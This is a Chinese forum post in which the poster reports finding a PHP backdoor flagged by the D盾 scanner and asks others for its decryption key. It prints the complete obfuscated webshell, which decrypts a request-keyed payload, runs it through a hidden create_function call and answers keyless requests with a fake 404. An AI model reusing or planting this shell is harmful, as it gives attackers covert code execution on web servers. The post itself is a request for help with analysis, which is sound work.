无意中发现一个奇怪的后门,D盾认证为已知后门,text值在某些后门网站记录着,D盾也认证为已知后门,应该是以前某位大佬常用的,经过分析发现需要key解出一句话才能继续传参执行.有大佬知道这个key值吗
error_reporting(0);
set_time_limit(0);
function amazon_base($data,$key){
$key=md5($key);
$x=0;
$data=base64_decode($data);
$len = strlen($data);
$l = strlen($key);
$char='';
for ($i=0;$i< $len;$i++)
{
if ($x== $l) $x=0;
$char.=substr($key,$x,1);
$x++;
}
$str='';
for ($i=0;$i< $len;$i++)
{
if (ord(substr($data,$i,1))<ord(substr($char,$i,1)))
{
$str.=chr((ord(substr($data,$i,1))+256)-ord(substr($char,$i,1)));
}
else
{
$str.=chr(ord(substr($data,$i,1))-ord(substr($char,$i,1)));
}
}
return base64_decode($str);
}
if(@$_REQUEST['key']){
$text=amazon_base('tn96sr2Ol5vGzrqtln16mo22nMqtrZ/Ofpqnnotifn+6jY5/uGiFl62Trp+VjaChlNCt1MKL0tiXqpSXf3R+e75phqXGaoCctai6q5WNipt8zKCY',$_REQUEST['key']);
$S3=strrev('31tor_rtS');$S4=$S3('onfr64_qrpbqr');$SS=$S4($S3(D3WyLKEyK0M1ozA0nJ9h));$St=$SS('',$text);$St();
}else{
Exit(@Header('HTTP/1.0 404 Not Found'));
}